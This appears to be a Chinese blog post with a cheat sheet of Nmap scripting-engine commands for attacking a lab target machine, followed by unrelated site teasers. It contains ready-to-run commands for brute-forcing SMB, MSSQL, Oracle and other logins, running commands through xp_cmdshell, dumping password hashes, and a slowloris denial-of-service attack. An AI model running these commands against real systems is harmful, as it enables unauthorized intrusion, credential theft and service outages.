Nmap的使用測試入侵靶機(jī)

-sC: 等價(jià)于--script=default,使用默認(rèn)類別的腳本進(jìn)行掃描 可更換其他類別 --script=

scripts>: 使用某個(gè)或某類腳本進(jìn)行掃描,支持通配符描述

--script-args=: 為腳本提供默認(rèn)參數(shù)

--script-args-file=filename: 使用文件來為腳本提供參數(shù) --script-trace:

顯示腳本執(zhí)行過程中發(fā)送與接收的數(shù)據(jù) --script-updatedb: 更新腳本數(shù)據(jù)庫

--script-help=:

顯示腳本的幫助信息,其中部分可以逗號分隔的文件或腳本類別


nmap腳本主要分為以下幾類,在掃描時(shí)可根據(jù)需要設(shè)置--script=類別這種方式進(jìn)行比較籠統(tǒng)的掃描:

auth: 負(fù)責(zé)處理鑒權(quán)證書(繞開鑒權(quán))的腳本

broadcast: 在局域網(wǎng)內(nèi)探查更多服務(wù)開啟狀況,如dhcp/dns/sqlserver等服務(wù)

brute: 提供暴力破解方式,針對常見的應(yīng)用如http/snmp等

default: 使用-sC或-A選項(xiàng)掃描時(shí)候默認(rèn)的腳本,提供基本腳本掃描能力

discovery: 對網(wǎng)絡(luò)進(jìn)行更多的信息,如SMB枚舉、SNMP查詢等

dos: 用于進(jìn)行拒絕服務(wù)攻擊

exploit: 利用已知的漏洞入侵系統(tǒng)

external: 利用第三方的數(shù)據(jù)庫或資源,例如進(jìn)行whois解析

fuzzer: 模糊測試的腳本,發(fā)送異常的包到目標(biāo)機(jī),探測出潛在漏洞 intrusive: 入侵性的腳本,此類腳本可能引發(fā)對方的IDS/IPS的記錄或屏蔽

malware: 探測目標(biāo)機(jī)是否感染了病毒、開啟了后門等信息

safe: 此類與intrusive相反,屬于安全性腳本

version: 負(fù)責(zé)增強(qiáng)服務(wù)與版本掃描(Version Detection)功能的腳本

vuln: 負(fù)責(zé)檢查目標(biāo)機(jī)是否有常見的漏洞(Vulnerability),如是否有MS08_067

(1)nmap --script=auth 192.168.137.*

負(fù)責(zé)處理鑒權(quán)證書(繞開鑒權(quán))的腳本,也可以作為檢測部分應(yīng)用弱口令


(2)nmap --script=brute 192.168.137.*

提供暴力破解的方式 ?可對數(shù)據(jù)庫,smb,snmp等進(jìn)行簡單密碼的暴力猜解


(3)nmap --script=default 192.168.137.*或者nmap -sC 192.168.137.*

默認(rèn)的腳本掃描,主要是搜集各種應(yīng)用服務(wù)的信息,收集到后,可再針對具體服務(wù)進(jìn)行攻擊


(4)nmap --script=vuln 192.168.137.*

檢查是否存在常見漏洞


(5)nmap -n -p445 --script=broadcast 192.168.137.4

在局域網(wǎng)內(nèi)探查更多服務(wù)開啟狀況


(6)nmap --script external 202.103.243.110

利用第三方的數(shù)據(jù)庫或資源,例如進(jìn)行whois解析



0×02 nmap按應(yīng)用服務(wù)掃描

檢查vnc bypass

1? nmap ?--script=realvnc-auth-bypass 192.168.137.4


檢查vnc認(rèn)證方式

2? nmap ?--script=vnc-auth ?192.168.137.4


獲取vnc信息

3? nmap ?--script=vnc-info ?192.168.137.4



(2)smb掃描:

smb破解

? nmap? --script=smb-brute.nse 192.168.137.4


smb字典破解

nmap --script=smb-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd192.168.137.4

smb已知幾個(gè)嚴(yán)重漏


nmap ?--script=smb-check-vulns.nse --script-args=unsafe=1 192.168.137.4

查看共享目錄


nmap -p 445 ?--script smb-ls--script-args ‘share=e$,path=\,smbuser=test,smbpass=test’ 192.168.137.4

查詢主機(jī)一些敏感信息(注:需要下載nmap_service)


nmap -p 445 -n –script=smb-psexec --script-args= smbuser=test,smbpass=test192.168.137.4


查看會話


nmap -n -p445 --script=smb-enum-sessions.nse --script-args=smbuser=test,smbpass=test192.168.137.4

系統(tǒng)信息


nmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser=test,smbpass=test192.168.137.4

Mssql掃描:

猜解mssql用戶名和密碼


nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd192.168.137.4

xp_cmdshell 執(zhí)行命令


nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user"192.168.137.4

dumphash值


nmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.username=sa,mssql.password=sa ?192.168.137.4


掃描root空口令


nmap -p3306 --script=mysql-empty-password.nse 192.168.137.4

列出所有mysql用戶


nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 192.168.137.4

支持同一應(yīng)用的所有腳本掃描


nmap --script=mysql-* 192.168.137.4


(5)Oracle掃描:

oracle sid掃描


nmap --script=oracle-sid-brute -p 1521-1560 192.168.137.5

oracle弱口令破解


nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd192.168.137.5

(6)其他一些比較好用的腳本


nmap --script=broadcast-netbios-master-browser 192.168.137.4? 發(fā)現(xiàn)網(wǎng)關(guān)

nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.137.4 ?破解rsync

nmap --script informix-brute -p 9088 192.168.137.4 ? ?informix數(shù)據(jù)庫破解

nmap -p 5432 --script pgsql-brute 192.168.137.4 ? ? ? pgsql破解

nmap -sU --script snmp-brute 192.168.137.4 ? ? ? ? ? ?snmp破解

nmap -sV --script=telnet-brute 192.168.137.4 ? ? ? ? ?telnet破解

nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' ?jboss autopwn

nmap --script=http-methods.nse 192.168.137.4 檢查http方法

nmap --script http-slowloris --max-parallelism 400 192.168.137.4 ?dos攻擊,對于處理能力較小的站點(diǎn)還挺好用的 'half-HTTP' connections

nmap --script=samba-vuln-cve-2012-1182 ?-p 139 192.168.137.4


nmap Help?

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌,老刑警劉巖,帶你破解...
    沈念sama閱讀 227,488評論 6 531
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 98,034評論 3 414
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人,你說我怎么就攤上這事。” “怎么了?”我有些...
    開封第一講書人閱讀 175,327評論 0 373
  • 文/不壞的土叔 我叫張陵,是天一觀的道長。 經(jīng)常有香客問我,道長,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 62,554評論 1 307
  • 正文 為了忘掉前任,我火速辦了婚禮,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘。我一直安慰自己,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 71,337評論 6 404
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著,像睡著了一般。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 54,883評論 1 321
  • 那天,我揣著相機(jī)與錄音,去河邊找鬼。 笑死,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播,決...
    沈念sama閱讀 42,975評論 3 439
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 42,114評論 0 286
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎,沒想到半個(gè)月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 48,625評論 1 332
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 40,555評論 3 354
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 42,737評論 1 369
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情,我是刑警寧澤,帶...
    沈念sama閱讀 38,244評論 5 355
  • 正文 年R本政府宣布,位于F島的核電站,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 43,973評論 3 345
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧,春花似錦、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 34,362評論 0 25
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 35,615評論 1 280
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 51,343評論 3 390
  • 正文 我出身青樓,卻偏偏與公主長得像,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 47,699評論 2 370

推薦閱讀更多精彩內(nèi)容

  • Nmap掃描原理與用法 1Nmap介紹 Nmap掃描原理與用法PDF:下載地址 Nmap是一款開源免費(fèi)的網(wǎng)絡(luò)發(fā)現(xiàn)(...
    y0ungta1a閱讀 5,408評論 0 50
  • nmap使用指南(終極版) 原創(chuàng)2017-09-09hl0rey信安之路 一、目標(biāo)指定 1.CIDR標(biāo)志位 192...
    用電熱毯烤豬閱讀 12,019評論 1 49
  • 一.基礎(chǔ)概念 不能單純的以端口辨別服務(wù)。很多網(wǎng)絡(luò)服務(wù)是漏洞頻發(fā)的高危對象,對網(wǎng)絡(luò)上的特定服務(wù)進(jìn)行掃描,往往能讓我們...
    linx255閱讀 1,990評論 0 0
  • 作者:Gilberto Najera-Gutierrez譯者:飛龍協(xié)議:CC BY-NC-SA 4.0 簡介 在每...
    三月行者閱讀 1,542評論 0 17
  • 前兩天找?guī)熃懔奶欤瑥牧奶熘锌闯鏊€沒插本考試失利的低谷中走出來,她回復(fù)我得都是一些否定詞:沒有、不知道、還不確...
    慢就是快的追夢女孩閱讀 792評論 0 0